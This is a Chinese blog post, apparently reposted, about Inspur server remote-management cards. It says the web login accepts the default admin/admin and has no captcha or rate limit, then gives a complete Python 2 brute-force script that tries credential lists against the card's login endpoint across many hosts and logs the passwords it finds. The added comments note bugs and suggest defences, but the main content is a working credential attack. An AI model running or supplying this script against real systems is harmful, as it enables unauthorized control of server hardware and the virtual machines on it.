浪潮远控卡是一款插在服务器上的远程管理卡,方便运维人员和服务器管理人员对服务器进行远程控制,其在80端口对外提供HTTP(WEB)服务。登录以后可以对服务器硬件进行远程控制和管理,例如监控CPU、内存等性能指标,远程开启或关闭服务器上的虚拟机,甚至可以被当作控制虚拟主机的跳板机。
爆破成功
浪潮远控卡可以尝试使用admin/admin登录,很有可能可以进去。另外,浪潮远控卡的登录页面没有验证码,也没有登录频率限制,可以轻松使用burpsuite进行登录爆破尝试。
下面是某位大大的脚本
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Credential-guessing checker for the web login of the remote management card
# described in the surrounding article.
#
# Python 2 only: it relies on reload(sys) / sys.setdefaultencoding and on the
# "except Exception,ex" syntax, neither of which is accepted by Python 3.
#
# Defender's view: every guess is a single plain-HTTP POST to
# /rpc/WEBSES/create.asp carrying WEBVAR_USERNAME and WEBVAR_PASSWORD, sent
# with the fixed Firefox 57 User-Agent defined in HEADER.  Runs of such POSTs
# from one source in web or proxy logs are the trace this script leaves.
# Changing the admin/admin account, adding lockout or rate limiting on the
# login endpoint, and keeping the management port off untrusted networks
# address the conditions the article describes.

# Library imports (os is imported but not referenced anywhere below).
import os
import sys
import logging
import requests
from optparse import OptionParser

# Process-wide setup: force the Python 2 default string encoding to UTF-8 and
# send timestamped INFO-level log lines to the root logger.
reload(sys)
sys.setdefaultencoding("utf-8")
logging.basicConfig(format='%(asctime)s-%(message)s',datefmt='%Y-%m-%d %H:%M:%S %p',level=logging.INFO)

# Module-level constants and mutable word lists.
# HEADER is sent unchanged with every login request.
HEADER = {
    "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0",
    "Accept":"application/json, text/plain, */*",
    "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding":"gzip, deflate",
    "Content-Type":"application/json;charset=utf-8"
}
# Substring that vuln_check() looks for in a login response.
SUCCESS_FLAG = "SESSION_COOKIE"
# Built-in candidates; config_read_from_file() appends to these lists, it
# never replaces them, so admin/admin is always tried.
USERNAME_LIST = ["admin"]
PASSWORD_LIST = ["admin"]

# Helper functions.
def config_read_from_file(userfile,pswdfile):
    """Append the lines of userfile / pswdfile to the global word lists.

    Each file is handled independently.  Any exception while opening or
    reading one of them (including open(None) when the matching command-line
    option was omitted) is logged and that list keeps its current contents.
    Always returns 0.
    """
    global USERNAME_LIST
    global PASSWORD_LIST
    logging.info("[+] Read Configuration From File ...")
    try:
        with open(userfile,"r") as fr:
            for line in fr.readlines():
                # NOTE(review): the separators here are the two-character
                # strings "/n" and "/r" (forward slash), not the escape
                # sequences "\n" / "\r", so this is not a newline strip.
                line = line.split("/n")[0].split("/r")[0]
                USERNAME_LIST.append(line)
    except Exception,ex:
        logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)
        logging.error(logstr)
        logging.info("[+] Use Default Dict!")
    try:
        with open(pswdfile,"r") as fr:
            for line in fr.readlines():
                # Same "/n" / "/r" split as for the username file above.
                line = line.split("/n")[0].split("/r")[0]
                PASSWORD_LIST.append(line)
    except Exception,ex:
        logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)
        logging.error(logstr)
        logging.info("[+] Use Default Dict!")
    return 0

def login_packet_send(target,username,password):
    """POST one username/password pair to the card's login endpoint.

    Returns the raw response body when the HTTP status is 200, and -1 on any
    request exception or any other status code.  The request uses plain HTTP
    and a 5 second timeout.
    """
    login_data = {"WEBVAR_USERNAME":username,"WEBVAR_PASSWORD":password}
    try:
        # NOTE(review): requests form-encodes a dict passed as data=, while
        # HEADER still declares application/json; the article does not say
        # which of the two the login handler actually expects.
        response = requests.post("http://%s/rpc/WEBSES/create.asp"%str(target),headers=HEADER,data=login_data,timeout=5)
    except Exception,ex:
        logstr = "[-] Connect Failed Reason:%s"%str(ex)
        logging.error(logstr)
        return -1
    if response.status_code != 200:
        return -1
    else:
        return response.content

def vuln_check(content):
    """Classify a login response body.

    Returns 0 when content contains SUCCESS_FLAG and does not contain the
    failure marker string, otherwise -1.
    """
    if content.find(SUCCESS_FLAG) >= 0 and content.find("Failure_Login_IPMI_Then_LDAP_then_Active_Directory_Radius") < 0:
        return 0
    else:
        return -1

def crack(target,username,password):
    """Try one credential pair against target and log it if accepted.

    Returns 0 when vuln_check() accepts the response, -1 otherwise (including
    when the request itself failed).
    """
    content = login_packet_send(target,username,password)
    if content != -1:
        if vuln_check(content) == 0:
            # The accepted password is written to the log in clear text.
            logging.info("[*] Crack %s Success! Username:%s,Password:%s"%(str(target),str(username),str(password)))
            return 0
    return -1

def scan(target,targettype):
    """Run crack() for every target x username x password combination.

    targettype == 1 treats target as the path of a file with one host per
    line; any other value treats target as a single host.  Requests are sent
    sequentially, with no delay between attempts and no stop after a hit.
    Returns None.
    """
    targetlist = []
    if targettype == 1:
        try:
            with open(target,"r") as fr:
                for line in fr.readlines():
                    # Same "/n" / "/r" split as in config_read_from_file();
                    # spaces are removed afterwards.
                    line = line.split("/n")[0].split("/r")[0].replace(" ","")
                    targetlist.append(line)
        except Exception,ex:
            # An unreadable target file is ignored silently; the loops below
            # then run over whatever was collected before the error.
            pass
    else:
        targetlist = [target]
    # NOTE(review): this tests the length of the target argument (host string
    # or file path), not of targetlist.
    if len(target) > 0:
        for item in targetlist:
            for user in USERNAME_LIST:
                for pswd in PASSWORD_LIST:
                    crack(item,user,pswd)

# Command-line entry point.
if __name__ == "__main__":
    parser = OptionParser()
    parser.add_option("-t", "--target", dest="target",help="target to check")
    parser.add_option("-f", "--filename", dest="targetfile",help="targetfiel to check")
    parser.add_option("-u", "--userfile", dest="userfile",help="username dict")
    parser.add_option("-p", "--pswdfile", dest="pswdfile",help="password dict")
    (options, args) = parser.parse_args()
    # Word lists are loaded first; omitted -u / -p leave only the built-in
    # admin/admin pair.
    config_read_from_file(options.userfile,options.pswdfile)
    # -t takes precedence over -f; with neither option given nothing is sent.
    if options.target not in ["",None," "]:
        scan(options.target,0)
    elif options.targetfile not in ["",None," "]:
        scan(options.targetfile,1)
原文:http://www.cnblogs.com/KevinGeorge/p/8358456.html
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。